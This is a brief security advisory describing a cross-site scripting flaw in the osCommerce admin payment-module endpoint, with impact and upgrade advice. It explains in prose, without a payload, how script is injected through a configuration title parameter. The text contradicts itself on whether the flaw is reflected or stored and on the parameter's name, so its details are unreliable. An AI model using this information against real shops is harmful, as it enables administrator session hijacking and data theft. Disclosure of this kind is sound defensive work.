Os Commerce 4.12.56860 - Cross Site Scripting Reflected (XSS)

Vulnerability

The osCommerce e-commerce platform is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability affecting the /admin/modules/save?set=payment endpoint. Attackers can inject arbitrary JavaScript through the `configuration_title1` parameter. This issue exists in versions prior to the fix referenced in the advisory [1][2].

Exploitation

An attacker needs administrative access to the osCommerce backend to reach the vulnerable endpoint. The attacker submits a crafted value for the configuration_title[1] parameter containing a malicious script. When the stored data is later rendered in an administrator's browser, the script executes [2].

Impact

Successful exploitation results in arbitrary JavaScript execution in the context of an authenticated administrator's browser session. This can lead to session hijacking, defacement, or theft of sensitive administrative data [2].

Mitigation

The fix for this vulnerability is included in the latest version of osCommerce, available from the official website [1]. Administrators should upgrade to the patched version. As a workaround, ensure that only trusted users have administrative access and apply input validation on the affected parameter if a custom patch is required [2].